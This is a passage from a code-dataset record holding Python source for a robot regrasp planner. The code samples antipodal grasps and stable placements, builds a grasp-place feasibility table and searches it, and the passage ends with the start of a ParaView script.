self.GetCostLowerBound(compClouds[targObj], normals[targObj],\n pointCosts[targObj], graspContacts, finalCosts)\n \n # send relevant data to each worker\n message = [\"regrasp\", compClouds[targObj], normals[targObj], pointCosts[targObj], finalPoses,\n finalCosts, startObstacles[0], finalObstacles[0], grasps, graspCosts, graspContacts,\n graspBinormals, bestPossibleCosts[i]]\n try:\n print(\"Starting regrasp planning worker {} with goal costs {}.\".format(i, finalCosts))\n connection = Client(('localhost', 7000 + i))\n except:\n for connection in connections: connection.close()\n raise Exception(\"Unable to connect to worker {}.\".format(i))\n connection.send(message)\n connections.append(connection)\n \n # determine when to cancel workers\n print(\"Best possible plan cost is {}.\".format(min(bestPossibleCosts) - self.insignificantCost))\n \n # wait for result\n pickPlaces = []; goalIdxs = []; costs = []; workerIdxs = []\n done = zeros(len(connections), dtype = 'bool')\n i = -1\n \n while not done.all():\n \n # check the next connection\n i = 0 if i + 1 == len(connections) else i + 1 \n \n # ignore connections that are done\n if done[i]: continue\n \n # if there is a result waiting, receive it\n if connections[i].poll(0.1): \n message = connections[i].recv()\n connections[i].close()\n purpose = message[0]\n data = message[1:]\n if purpose == \"regrasp\":\n pickPlaces.append(data[0])\n goalIdxs.append(data[1])\n costs.append(data[2])\n workerIdxs.append(i)\n done[i] = True\n # the lower bound for this worker is no longer achievable\n bestPossibleCosts[i] = data[2] + self.insignificantCost\n print(\"Worker {} completed with cost {}.\".format(i, costs[-1]))\n else:\n print(\"Warning: message had purpose {}\".format(message[0]))\n continue\n \n # send cancel if there is a solution and the best cost is acheived\n if len(costs) > 0 and min(costs) <= min(bestPossibleCosts):\n try: connections[i].send([\"regrasp-cancel\", min(costs)])\n except: print(\"Warning: failed to send cancel to worker {}.\".format(i))\n \n # save data for continuation\n self.contTargObjs = targObjs\n self.contUniqueTargObjs = uniqueTargObjs\n \n # return best result\n bestIdx = argmin(costs)\n print(\"Worker {} had best cost {} with object {}.\".format( \\\n workerIdxs[bestIdx], costs[bestIdx], uniqueTargObjs[workerIdxs[bestIdx]]))\n \n targObjIdx = uniqueTargObjs[workerIdxs[bestIdx]]\n goalIdx = where(targObjIdx == targObjs)[0][goalIdxs[bestIdx]]\n\n return pickPlaces[bestIdx], goalIdx, targObjIdx\n \n def PlanWorker(self, cloud, normals, pointCosts, goalPlaces, goalCosts, obstacleCloudAtStart,\n obstacleCloudAtGoal, graspsNew, graspCostsNew, graspContacts, graspBinormals, bestPossibleCost,\n connection):\n '''Searches for a minimum-cost regrasp plan for the given target object.\n \n - Input cloud: Point cloud (nx3 numpy array) representing the object.\n - Input normals: Surface normals (nx3 numpy array, assumed normalized) for the object.\n - Input pointCosts: n-element array of contact costs associated with each point.\n - Input goalPlaces: List of m placement goals, 4x4 transforms of object from it's current pose.\n - Input goalCosts: Costs associated with each placement goal (m, non-negative elements).\n - Input obstacleCloudAtStart: Point cloud representing obstacles at the object's initial location.\n - Input obstacleCloudAtGoal: Point cloud representing obstacles at the object's goal location.\n - Input graspsNew: List of k initially sampled grasps (4x4 transforms). (More are sampled as\n this function executes.)\n - Input graspCostsNew: Costs for each of the k grasps.\n - Input graspContacts: Pairs of indices into cloud for contact points for each of the k grasps.\n - Input graspBinormals: Closing direction for each of the k grasps.\n - Input bestPossibleCost: A lower bound on the cost that can be achieved by this \n - Input connection: An open Python Connection, allowing sending messages to and receiving\n messages from the parent process. (PlanWorker is invoked when a message from the parent\n process is received. The parent process waits in Plan for PlanWorker to finish.)\n - Returns pickPlaces: List of gripper poses (4x4 homogeneous transforms), relative to the world\n frame, for each grasp and place. The list is of even length. Returns None if no plan is found.\n - Returns goalIdx: Index into goalPlaces that was ultimatly used for placing the object. Returns\n None if no regrasp plan is found.\n - Returns cost: The cost of the regrasp plan. Inf if no plan is found.\n '''\n \n # Input checking\n \n if cloud.shape[0] != normals.shape[0]:\n raise Exception(\"Cloud and normals must have the same number of points.\")\n \n if cloud.shape[1] != 3 or normals.shape[1] != 3:\n raise Exception(\"Cloud and normals must be 3D.\")\n \n if pointCosts.size != cloud.shape[0]:\n raise Exception(\"Must have the same number of point costs as points.\")\n \n if isnan(pointCosts).any():\n raise Exception(\"Point costs must not be NaN.\")\n \n if len(pointCosts) > 0 and min(pointCosts) < 0:\n raise Exception(\"Point costs must be non-negative.\")\n \n if len(goalPlaces) != len(goalCosts):\n raise Exception(\"Mismatch in size of goalPlaces and goalCosts.\")\n \n if isnan(goalCosts).any():\n raise Exception(\"Goal costs must not be NaN.\")\n \n if len(goalCosts) > 0 and min(goalCosts) < 0:\n raise Exception(\"Goal costs must be non-negative.\")\n \n if obstacleCloudAtStart.shape[1] != 3 or obstacleCloudAtGoal.shape[1] != 3:\n raise Exception(\"Obstacle clouds must be 3D.\")\n \n if len(graspsNew) != len(graspCostsNew):\n raise Exception(\"Mismatch in size of graspsNew and graspCostsNew.\")\n \n if isnan(graspCostsNew).any():\n raise Exception(\"Grasp costs must not be NaN.\")\n \n if min(graspCostsNew) < 0:\n raise Exception(\"Grasp costs must be non-negative.\")\n \n if graspContacts.shape[0] != graspBinormals.shape[0]:\n raise Exception(\"Mismatch in size between graspContacts and graspBinormals.\")\n \n if graspContacts.shape[1] != 2:\n raise Exception(\"graspContacts must be 2D.\")\n \n if graspBinormals.shape[1] != 3:\n raise Exception(\"graspBinormals must be 3D.\")\n \n # Initialize regrasp planning graph and other variables.\n \n grasps = []\n graspCosts = zeros(0)\n tempPlaces = []\n originalGoalPlaces = goalPlaces\n goalPlaces = []\n placeCosts = zeros(0)\n graspPlaceTable = zeros((0, 1), dtype = \"int32\", order = \"C\")\n \n # Initialize place sampler.\n \n supportingTriangles, triangleNormals, cloudCenter = self.GetSupportSurfaces(cloud)\n \n if len(supportingTriangles) == 0:\n print(\"No supporting faces found! No regrasp plan found.\")\n self.SaveContinuationData([], cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces,\n goalCosts, graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts,\n obstacleCloudAtStart, obstacleCloudAtGoal)\n return [], None, float('inf')\n \n # Check for early exit.\n \n if len(graspContacts) == 0:\n print(\"No antipodal contacts found! No regrasp plan found.\")\n self.SaveContinuationData([], cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces,\n goalCosts, graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts,\n obstacleCloudAtStart, obstacleCloudAtGoal)\n return [], None, float('inf')\n \n # Search for plans.\n \n plan = []; cost = float('inf')\n nReachableStart = 1; nReachableGoal = 1; notFirstLoop = False \n \n for iteration in xrange(self.maxIterations):\n \n if cost <= bestPossibleCost: break\n \n if connection.poll():\n message = connection.recv()\n if message[0] == \"regrasp-cancel\":\n print(\"Received cancel.\")\n self.SaveContinuationData([], cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces,\n goalCosts, graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts, \n obstacleCloudAtStart, obstacleCloudAtGoal)\n return [], None, float('inf')\n \n #print(\"Sampling grasps and places.\")\n if notFirstLoop:\n graspsNew, pairsNew = self.SampleGrasps(cloud, normals, graspContacts, graspBinormals)\n graspCostsNew = self.GetGraspCosts(cloud, normals, pointCosts, pairsNew)\n else:\n notFirstLoop = True\n \n if nReachableStart > 0 and nReachableGoal > 0:\n tempPlacesNew, tempPlacesNewTriangles = self.SamplePlaces(cloud, supportingTriangles,\n triangleNormals, cloudCenter)\n tempPlaceCostsNew = self.GetPlaceCosts(pointCosts, tempPlacesNewTriangles)\n else:\n tempPlacesNew = []\n tempPlaceCostsNew = zeros(0)\n \n goalPlacesNew = originalGoalPlaces[len(goalPlaces) : len(goalPlaces) + \\\n self.nGoalPlaceSamples] if nReachableStart > 0 else []\n goalPlaceCostsNew = goalCosts[len(goalPlaces) : len(goalPlaces) + self.nGoalPlaceSamples] \\\n if nReachableStart > 0 else zeros(0)\n \n #print(\"Updating grasp-place table.\")\n graspPlaceTable, placeTypes, grasps, graspCosts, tempPlaces, goalPlaces, placeCosts, \\\n nReachableStart, nReachableTemp, nReachableGoal = self.UpdateGraspPlaceTable(\n graspPlaceTable, grasps, graspsNew, graspCosts, graspCostsNew, tempPlaces, tempPlacesNew,\n goalPlaces, goalPlacesNew, placeCosts, tempPlaceCostsNew, goalPlaceCostsNew,\n obstacleCloudAtStart, obstacleCloudAtGoal)\n if nReachableStart == 0 or nReachableGoal == 0: continue\n \n #print(\"Searching grasp-place graph.\")\n plan, cost = self.SearchGraspPlaceGraph(graspPlaceTable, placeTypes, graspCosts, placeCosts)\n print(\"Iteration: {}. Regrasp plan: {}. Cost: {}.\".format(iteration, plan, cost))\n \n # Return result\n \n pickPlaces, goalIdx = self.PlanToTrajectory(plan, grasps, tempPlaces, goalPlaces)\n \n self.SaveContinuationData(plan, cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces, goalCosts,\n graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts, obstacleCloudAtStart,\n obstacleCloudAtGoal) \n \n return pickPlaces, goalIdx, cost\n \n def PlanToTrajectory(self, plan, grasps, tempPlaces, goalPlaces):\n '''Converts a plan into a sequence of gripper poses.\n \n - Input plan: List of indices, where the 1st index is into grasps and the 2nd index is into \n [start, tempPlaces, goalPlaces].\n - Input grasps: List of homogeneous transforms representing antipodal grasps on the object in\n the base frame at the object's starting configuration.\n - Input tempPlaces: List of homogeneous transforms representing the object at a temporary place.\n - Input goalPlaces: List of homogeneous transforms representing the object's goal placements.\n - Returns pickPlaces: List of transforms representing the gripper in the base frame at\n alternating grasp and ungrasp (i.e. place) configurations (starting with grasping the object\n at its present configuration). \n - Returns goalIdx: Index into goalPlaces for the goal configuration the plan ends with.\n '''\n \n pickPlaces = []\n goalIdx = None\n for item in plan:\n graspIdx = item[0]\n placeIdx = item[1]\n if placeIdx == 0:\n placePose = eye(4)\n elif placeIdx <= len(tempPlaces):\n placePose = tempPlaces[placeIdx - 1]\n else:\n goalIdx = placeIdx - 1 - len(tempPlaces)\n placePose = goalPlaces[goalIdx]\n pickPlaces.append(dot(placePose, grasps[graspIdx]))\n \n return pickPlaces, goalIdx\n \n def PreSampleGraspsOnObjects(self, clouds, normals, pointCosts, nSamples, visualize = False):\n '''Samples grasps on each object to be used next time Plan is called.\n \n - Input clouds: A point cloud for each object to sample grasps on.\n - Input normals: Object surface normals for each cloud (assumed to be normalized).\n - Input pointCosts: Per-point contact costs for each cloud.\n - Input nSamples: Number of grasps to randomly sample.\n - Input visualize: If True, shows the grasps found in the viewer for each object.\n - Returns preGraspSamples: Grasps for each object sampled.\n '''\n \n # input checking\n \n if len(normals) != len(clouds) or len(pointCosts) != len(clouds):\n raise Exception(\"Inconsistent number of objects.\")\n \n # sample grasps for each object \n self.preSampledClouds = clouds; self.preSampledPairs = []; self.preSampledBinormals = []\n self.preSampledGrasps = []; self.preSampledGraspCosts = []\n \n for i in xrange(len(clouds)):\n \n pairs, binormals = self.GetAntipodalPairsOfPoints(clouds[i], normals[i])\n tmpSamples = self.nGraspSamples; self.nGraspSamples = nSamples\n grasps, pairsForGrasps = self.SampleGrasps(clouds[i], normals[i], pairs, binormals)\n self.nGraspSamples = tmpSamples\n graspCosts = self.GetGraspCosts(clouds[i], normals[i], pointCosts[i], pairsForGrasps)\n \n self.preSampledPairs.append(pairs)\n self.preSampledBinormals.append(binormals)\n self.preSampledGrasps.append(grasps)\n self.preSampledGraspCosts.append(graspCosts)\n \n if visualize:\n self.env.PlotDescriptors(hand_descriptor.DescriptorsFromPoses(grasps),\n matplotlib.cm.viridis(exp(-graspCosts)))\n raw_input(\"Grasps for object {}.\".format(i))\n \n return self.preSampledGrasps\n \n def SampleGrasps(self, cloud, normals, pairs, binormals):\n '''Samples antipodal grasps. See spatial antipodal grasps in \"A Mathematical Introduction to\n Robotic Manipulation\" by Murray, Li, and Sastry.\n \n - Input cloud: nx3 numpy array of points.\n - Input normals: nx3 numpy array of surface normal directions for each point in cloud, rows\n assumed to be normalized.\n - Input pairs: mx2 integer numpy where each row is a pair of indices into cloud indicating\n antipodal contact points. Computed in GetAntipodalPairsOfPoints.\n - Input binormals: mx3 numpy array of hand closing directions, corresponding to pairs, from\n GetAntipodalPairsOfPoints. Assumed to be normalized.\n - Returns grasps: List of k, 4x4 numpy matrices which are homogeneous transforms indicating\n randomly sampled grasps in the world frame. Grasps (approximately) make contact with antipodal\n pairs and are guaranteed to be collision-free (checked with the full gripper model) with the\n target object. Antipodal pairs, orientation about the binormal, and offset in approach\n direction are sampled uniformly at random.\n - Returns pairs: kx2 integer numpy array where each row is a pair of indices into the point\n cloud, indicating contacts, for each corresponding grasp.\n '''\n \n # Check inputs.\n \n if len(pairs) == 0:\n return [], zeros((0, 2), dtype = \"int32\")\n \n if len(cloud.shape) != 2 or cloud.shape[1] != 3:\n raise Exception(\"Point cloud not 3D.\")\n \n if len(normals.shape) != 2 or normals.shape[1] != 3:\n raise Exception(\"Surface normals not 3D.\")\n \n if normals.shape[0] != cloud.shape[0]:\n raise Exception(\"Cloud has {} points but normals has {}.\".format(\n cloud.shape[0], normals.shape[0]))\n \n if pairs.shape[1] != 2:\n raise Exception(\"Pairs not 2D.\") \n \n if max(pairs) >= cloud.shape[0]:\n raise Exception(\"Cloud has {} points, but indices in pairs go up to {}.\".format(\n cloud.shape[0], max(pairs)))\n \n if len(binormals.shape) != 2 or binormals.shape[1] != 3:\n raise Exception(\"Binormals not 3D.\") \n \n if binormals.shape[0] != pairs.shape[0]:\n raise Exception(\"Binormals has {} elements but pairs has {} elements.\".format(\n binormals.shape[0], pairs.shape[0]))\n \n # Sample hand poses from the remaining pairs of points.\n # The binormal (hand closing direction) is now fixed. Center x, y on the pair of points. \n # This leaves 2 free parameters: the approach direction and approach (z) offset.\n \n theta = uniform(0, 2 * pi, self.nGraspSamples)\n offset = uniform(-self.handDepth / 2.0, self.handDepth / 2.0, self.nGraspSamples)\n idx = randint(0, pairs.shape[0], self.nGraspSamples)\n \n pairs = pairs[idx]\n binormals = binormals[idx]\n \n grasps = []\n for i in xrange(self.nGraspSamples):\n \n approach = self.GetOrthogonalUnitVector(binormals[i])\n center = (cloud[pairs[i][0]] + cloud[pairs[i][1]]) / 2.0\n T0 = hand_descriptor.PoseFromApproachBinormalCenter(approach, binormals[i], center)\n R = openravepy.rotationMatrixFromAxisAngle(binormals[i], theta[i])[0:3, 0:3]\n \n T = eye(4)\n T[0:3, 0:3] = dot(R, T0[0:3, 0:3])\n T[0:3, 3] = center + offset[i] * T[0:3, 2]\n grasps.append(T)\n \n # Filter grasp samples whos actual contacts are not antipodal. This is important because we\n # implicitly assumed the pair along the binormal were contacts. Also, determine which pair of\n # points is truly in contact with the grasp.\n \n keepGrasps = []; contactPairs = []\n for i, grasp in enumerate(grasps):\n \n isAntipodal, pair = self.env.IsAntipodalGrasp(grasp, cloud, normals,\n self.cosHalfAngleOfGraspFrictionCone, self.env.graspContactWidth)\n \n if isAntipodal:\n keepGrasps.append(grasp)\n contactPairs.append(pair)\n \n grasps = keepGrasps\n pairs = array(contactPairs)\n \n # Filter grasp samples that collide with the object.\n collisionFree = logical_not(self.env.CheckHandObjectCollision(grasps, cloud))\n grasps = [grasps[i] for i in xrange(len(grasps)) if collisionFree[i]]\n pairs = pairs[collisionFree]\n \n # Return result\n return grasps, pairs\n \n def SamplePlaces(self, cloud, supportingTriangles, triangleNormals, cloudCenter):\n '''Randomly transforms for the point cloud where the object will rest stably on the supporting\n surface.\n \n - Input cloud: Point cloud of the object -- an nx3 numpy array.\n - Input supportingTriangles: Indices into cloud indicating facets on which the object will rest\n stably -- an mx3 integer numpy array. Each row corresponds to one facet. Can be computed by\n Planner.GetSupportSurfaces.\n - Input triangleNormals: Outward-pointing normals for supportTriangles -- mx3 numpy array with\n normalized rows. Can be comptued by Planner.GetSupportSurfaces.\n - Input cloudCenter: The mean point of the cloud -- 3-element numpy array. Can be computed by\n Planner.GetSupportSurfaces.\n - Returns places: List of k transforms which move the cloud from its current pose to the stable\n placement, relative to the world frame -- list of 4x4 numpy arrays.\n - Returns supportingTriangles: The support facets from supportingTriangles used -- kxn numpy\n integer array.\n '''\n \n # input checking\n if supportingTriangles.shape[0] != triangleNormals.shape[0]:\n raise Exception(\"supportingTriangles and triangleNormals must have same number of elements.\")\n \n if cloud.shape[1] != 3 or supportingTriangles.shape[1] != 3 or triangleNormals.shape[1] != 3 \\\n or cloudCenter.size != 3: raise Exception(\"Inputs must be 3D.\")\n \n if supportingTriangles.shape[0] == 0:\n return [], zeros((0, 3), dtype = \"int\")\n \n # randomly sample rotation of object about gravity and supporting face\n theta = uniform(0, 2 * pi, self.nTempPlaceSamples)\n idx = randint(0, supportingTriangles.shape[0], self.nTempPlaceSamples) \n \n places = []\n for i in xrange(self.nTempPlaceSamples):\n \n # attach a coordinate system to the cloud such that z is -triangleNormal\n bTo = eye(4)\n bTo[0:3, 3] = cloudCenter\n bTo[0:3, 2] = -triangleNormals[idx[i]]\n R = openravepy.matrixFromAxisAngle(bTo[0:3, 2], theta[i])[0:3, 0:3]\n bTo[0:3, 1] = dot(R, self.GetOrthogonalUnitVector(bTo[0:3, 2]))\n bTo[0:3, 0] = cross(bTo[0:3, 1], bTo[0:3, 2])\n \n # check the cloud in its new orientation\n oTb = point_cloud.InverseTransform(bTo)\n cloudRotated = point_cloud.Transform(oTb, cloud)\n \n # determine translation\n bToo = eye(4)\n bToo[0, 3] = self.temporaryPlacePosition[0]\n bToo[1, 3] = self.temporaryPlacePosition[1]\n bToo[2, 3] = self.temporaryPlacePosition[2] - min(cloudRotated[:, 2])\n places.append(dot(bToo, oTb))\n \n # visualization\n '''for i, place in enumerate(places):\n self.env.PlotCloud(point_cloud.Transform(place, cloud))\n raw_input(\"Showing {}th stable placement.\".format(i))'''\n \n return places, supportingTriangles[idx]\n \n def SaveContinuationData(self, plan, cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces, goalCosts,\n graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts, obstacleCloudAtStart,\n obstacleCloudAtGoal):\n '''TODO'''\n \n # remove grasps that are part of the current plan \n keepMask = ones(len(grasps), dtype = \"bool\")\n for i, step in enumerate(plan):\n keepMask[step[0]] = False\n graspPlaceTable = graspPlaceTable[keepMask, :]\n grasps = [grasps[i] for i in xrange(len(grasps)) if keepMask[i]]\n graspCosts = graspCosts[keepMask]\n \n # save \n self.contCloud = cloud\n self.contNormals = normals\n self.contGraspContacts = graspContacts\n self.contGraspBinormals = graspBinormals\n self.contPointCosts = pointCosts\n self.contTriangleNormals = triangleNormals\n self.contSupportingTriangles = supportingTriangles\n self.contCloudCenter = cloudCenter\n self.contOriginalGoalPlaces = originalGoalPlaces\n self.contGoalPlaces = goalPlaces\n self.contGoalCosts = goalCosts\n self.contGraspPlaceTable = graspPlaceTable\n self.contGrasps = grasps\n self.contGraspCosts = graspCosts\n self.contTempPlaces = tempPlaces\n self.contPlaceCosts = placeCosts\n self.contObstacleCloudAtStart = obstacleCloudAtStart\n self.contObstacleCloudAtGoal = obstacleCloudAtGoal\n \n def SearchGraspPlaceGraph(self, graspPlaceTable, placeTypes, graspCosts, placeCosts):\n '''Calls the C++ routine for performing A* search on the grasp-place table.\n \n - Input graspPlaceTable: Grasp-place table, with values in {-1, 0, 1}, assumed to be C-order of\n type int32.\n - Input placeTypes: Place types, with values in {0, 1, 2} assumed to be C-order of type int32.\n - Input graspCosts: The cost for selecting each grasp. A 1D numpy array of length\n graspPlaceTable.shape[0].\n - Input placeCosts: The cost for selecting each place. a 1D numpy array of length\n graspPlaceTable.shape[1].\n - Returns planList: List of pairs, [(grasp, place)_1, ..., (grasp, place)_n]\n - Returns cost: The total plan cost, equal to len(plan) * self.stepCost + goalCosts[goalIdx],\n where goalIdx corresponds to the placement selected.\n '''\n \n # input checking\n \n if placeTypes.size != graspPlaceTable.shape[1] or graspCosts.size != graspPlaceTable.shape[0] \\\n or placeCosts.size != graspPlaceTable.shape[1]:\n raise Exception(\"GraspPlace table has shape {}, but there are {} place types, {} grasp \" + \\\n \"costs, and {} place costs.\".format(graspPlaceTable.shape, placeTypes.size,\n graspCosts.size, placeCosts.size))\n \n graspCosts = ascontiguousarray(graspCosts, dtype = \"float32\")\n placeCosts = ascontiguousarray(placeCosts, dtype = \"float32\")\n \n # call C++ routine \n plan = -1 * ones(2 * self.maxSearchDepth, dtype = \"int32\", order = \"C\") \n cost = c_extensions.SearchGraspPlaceGraph(graspPlaceTable.shape[0], graspPlaceTable.shape[1],\n graspPlaceTable, placeTypes, graspCosts, placeCosts, self.stepCost, self.maxSearchDepth, plan)\n \n # make plan 2D\n planList = []\n for i in xrange(self.maxSearchDepth):\n if plan[2 * i + 0] < 0 or plan[2 * i + 1] < 0: break\n planList.append((plan[2 * i + 0], plan[2 * i + 1]))\n \n # return result\n return planList, cost\n \n def UpdateGraspPlaceTable(self, graspPlaceTable, grasps, graspsNew, graspCosts, graspCostsNew,\n tempPlaces, tempPlacesNew, goalPlaces, goalPlacesNew, placeCosts, tempPlaceCostsNew,\n goalPlaceCostsNew, obstacleCloudAtStart, obstacleCloudAtGoal):\n '''Expands the grasp-place table with new grasp and place samples and checks feasibility of\n each essential unchecked grasp-place combination.\n \n - Input graspPlaceTable: mxn numpy array, where the ith row corresponds to grasp i, the jth\n column corresponds to place j, and the value is 1 if the grasp i is feasible at place j, -1 if\n infeasible, and 0 if unknown.\n - Input grasps: m-element list of grasps (4x4 transforms) corresponding to rows of graspPlaceTable.\n - Input graspsNew: m'-element list of grasps corresponding to grasps to be added.\n - Input graspCosts: m-element numpy array of costs associated with each grasp in grasps.\n - Input graspCostsNew: m'-element numpy array of costs associated with each grasp in newGrasps.\n - Input tempPlaces: List of existing temporary places (4x4 transforms) corresponding to columns\n 1 to 1 + len(tempPlaces) of graspPlaceTable.\n - Input tempPlacesNew: List of temporary places to add as middle columns of graspPlaceTable.\n - Input goalPlaces: List of existing goal places corresponding to the last len(goalPlaces)\n columns of graspPlaceTable. n = 1 + len(goalPlaces) + len(tempPlaces).\n - Input goalPlacesNew: List of goal places to add to graspPlaceTable.\n n' = len(tempPlacesNew) + len(goalPlacesNew).\n - Input placeCosts: n-element array of costs associated with existing places.\n - Input tempPlaceCostsNew: Costs associated with tempPlacesNew.\n - Input goalPlaceCostsNew: Costs associated with goalPlacesNew.\n - Input obstacleCloudAtStart: Point cloud (nx3 numpy array) representing obstacles at the start.\n - Input obstacleCloudAtGoal: Point cloud representing obstacles at all goal places.\n - Returns graspPlaceTable: graspPlaceTable of shape (m+m')x(n+n') augmented with new grasps and\n new places, checked for feasiblilty. (Some feasibility checks can be skipped if no grasps are\n available at the start or any goal.)\n - Returns placeTypes: n+n'-element array with the type of each place: 0 at position j means the\n jth place/column is a start place, 1 is a temporary place, and 2 is a goal place.\n - Returns grasps: m+m'-element list of grasps corresponding to graspPlaceTable.\n - Returns graspCosts: m+m'-element list of costs assicated with each grasp in grasps.\n - Returns tempPlaces: List of places at the regrasp area.\n - Returns goalPlaces: List of places at the goal area.\n - Returns placeCosts: n+n'-element list of costs associated with each place.\n - Returns nReachableStart: The number of grasps reachable at the start pose of the object.\n - Returns nReachableTemp: The number of grasps reachable at temporary placements.\n - Returns nReachableGoal: The number of grasps reachable at goal placements.\n '''\n \n # Input checking.\n\n if len(grasps) != graspPlaceTable.shape[0]:\n raise Exception(\"Input {} grasps but graspPlaceTable has {} rows.\".format(\\\n len(grasps), graspPlaceTable.shape[0]))\n \n if len(grasps) != graspCosts.size:\n raise Exception(\"Input {} grasps but have {} grasp costs.\".format(\\\n len(grasps), graspCosts.size))\n \n if len(graspsNew) != graspCostsNew.size:\n raise Exception(\"Input {} new grasps but have {} new grasp costs.\".format(\\\n len(graspsNew), graspCostsNew.size))\n \n if 1 + len(tempPlaces) + len(goalPlaces) != graspPlaceTable.shape[1]:\n raise Exception(\"Input {} places but graspPlaceTable has {} columns.\".format(\\\n 1 + len(tempPlaces) + len(goalPlaces), graspPlaceTable.shape[1]))\n \n if len(tempPlacesNew) != tempPlaceCostsNew.size:\n raise Exception(\"Input {} new temp. places but have {} new temp. place costs.\".format(\\\n len(tempPlacesNew), tempPlaceCostsNew.size))\n \n if len(goalPlacesNew) != goalPlaceCostsNew.size:\n raise Exception(\"Input {} new goal places but have {} new goal costs.\".format(\\\n len(goalPlacesNew), goalPlaceCostsNew.size))\n \n if obstacleCloudAtStart.shape[1] != 3:\n raise Exception(\"Obstacle cloud at start not 3D.\")\n \n if obstacleCloudAtGoal.shape[1] != 3:\n raise Exception(\"Obstacle cloud at goal not 3D.\")\n \n if isnan(graspCosts).any(): raise Exception(\"graspCosts has NaN.\")\n if isnan(graspCostsNew).any(): raise Exception(\"graspCostsNew has NaN.\")\n if isnan(placeCosts).any(): raise Exception(\"placeCosts has NaN.\")\n if isnan(tempPlaceCostsNew).any(): raise Exception(\"tempPlaceCostsNew has NaN.\")\n if isnan(goalPlaceCostsNew).any(): raise Exception(\"goalPlaceCostsNew has NaN.\") \n \n # Semantics of grasp-place table: ======================\n # Rows: Places in order [start, temporary, goal]\n # Columns: [grasps].T\n # Values: (0) not checked, (-1) invalid, and (1) valid\n # ======================================================\n\n # Add a row for each new grasp.\n newRows = zeros((len(graspsNew), graspPlaceTable.shape[1]), dtype = \"int32\", order = \"C\")\n graspPlaceTable = vstack([graspPlaceTable, newRows])\n # Add a column for each new temporary place.\n newColumns = zeros((graspPlaceTable.shape[0], len(tempPlacesNew)), dtype = \"int32\", order = \"C\")\n graspPlaceTable = hstack([graspPlaceTable[:, :len(tempPlaces) + 1], newColumns,\n graspPlaceTable[:, len(tempPlaces) + 1:]])\n # Add a column for each new final place.\n newColumns = zeros((graspPlaceTable.shape[0], len(goalPlacesNew)), dtype = \"int32\", order = \"C\")\n graspPlaceTable = hstack([graspPlaceTable, newColumns])\n \n # Concatenate old and new grasp and place lists.\n placeCosts = concatenate([zeros(1), placeCosts[1:len(tempPlaces) + 1], tempPlaceCostsNew,\n placeCosts[len(tempPlaces) + 1:], goalPlaceCostsNew]) # must be before next 2 lines\n grasps += graspsNew; tempPlaces += tempPlacesNew; goalPlaces += goalPlacesNew\n graspCosts = concatenate([graspCosts, graspCostsNew])\n \n # Record place type for each column: (0) start, (1) temporary, and (2) goal.\n placeTypes = zeros(1 + len(tempPlaces) + len(goalPlaces), dtype = 'int32', order = \"C\")\n placeTypes[1:len(tempPlaces) + 1] = 1\n placeTypes[len(tempPlaces) + 1:] = 2 \n \n # Mark grasps as being valid / invalid.\n \n # find where checks need made\n row, col = nonzero(graspPlaceTable == 0)\n row = reshape(row, (row.size, 1))\n col = reshape(col, (col.size, 1))\n checkIdxs = hstack([row, col])\n \n # find grasp in place frame\n posesStart = []; posesTemp = []; posesGoal = []\n idxsStart = []; idxsTemp = []; idxsGoal = []\n for idx in checkIdxs:\n idx = tuple(idx)\n graspIdx = idx[0]\n placeIdx = idx[1]\n grasp = grasps[graspIdx]\n if placeTypes[placeIdx] == 0:\n posesStart.append(grasp)\n idxsStart.append(idx)\n elif placeTypes[placeIdx] == 1:\n place = tempPlaces[placeIdx - 1]\n posesTemp.append(dot(place, grasp))\n idxsTemp.append(idx)\n else:\n place = goalPlaces[placeIdx - len(tempPlaces) - 1]\n posesGoal.append(dot(place, grasp))\n idxsGoal.append(idx)\n \n # check reachability at start\n reachableStart = self.env.CheckReachability(\n posesStart, self.GetPreGrasps(posesStart), True, obstacleCloudAtStart)\n for i, idx in enumerate(idxsStart):\n graspPlaceTable[idx] = 1 if reachableStart[i] else -1\n nReachableStart = sum(graspPlaceTable[:, 0] > 0)\n if nReachableStart == 0:\n print(\"Found 0 start grasps.\")\n return graspPlaceTable, placeTypes, grasps, graspCosts, tempPlaces, goalPlaces, placeCosts, \\\n 0, 0, 0\n \n # check reachability at goal\n reachableGoal = self.env.CheckReachability(\n posesGoal, self.GetPreGrasps(posesGoal), True, obstacleCloudAtGoal)\n for i, idx in enumerate(idxsGoal):\n graspPlaceTable[idx] = 1 if reachableGoal[i] else -1\n nReachableGoal = sum(graspPlaceTable[:, 1 + len(tempPlaces):] > 0)\n if nReachableGoal == 0:\n print(\"Found {} start and 0 goal grasps.\".format(nReachableStart))\n return graspPlaceTable, placeTypes, grasps, graspCosts, tempPlaces, goalPlaces, placeCosts, \\\n nReachableStart, 0, 0\n \n # check reachability at temporary\n reachableTemp = self.env.CheckReachability(posesTemp, self.GetPreGrasps(posesTemp), True)\n for i, idx in enumerate(idxsTemp):\n graspPlaceTable[idx] = 1 if reachableTemp[i] else -1\n nReachableTemp = sum(graspPlaceTable[:, 1 : len(tempPlaces) + 1] > 0)\n \n # Return result\n \n print(\"Found {} start, {} temporary, and {} goal grasps.\".format(\n nReachableStart, nReachableTemp, nReachableGoal))\n \n return graspPlaceTable, placeTypes, grasps, graspCosts, tempPlaces, goalPlaces, placeCosts, \\\n nReachableStart, nReachableTemp, nReachableGoal","sub_path":"Robot/scripts/geom_pick_place/planner_regrasp.py","file_name":"planner_regrasp.py","file_ext":"py","file_size_in_byte":60327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"421641358","text":"\"\"\"\nZhen Lu 2018\nmake video with iso-contour of pressure\n\"\"\"\n#### import the simple module from the paraview\nfrom paraview.simple import *\n#### disable automatic camera reset on 'Show'\nparaview.simple._DisableFirstRenderCameraReset()\n\n# create a new 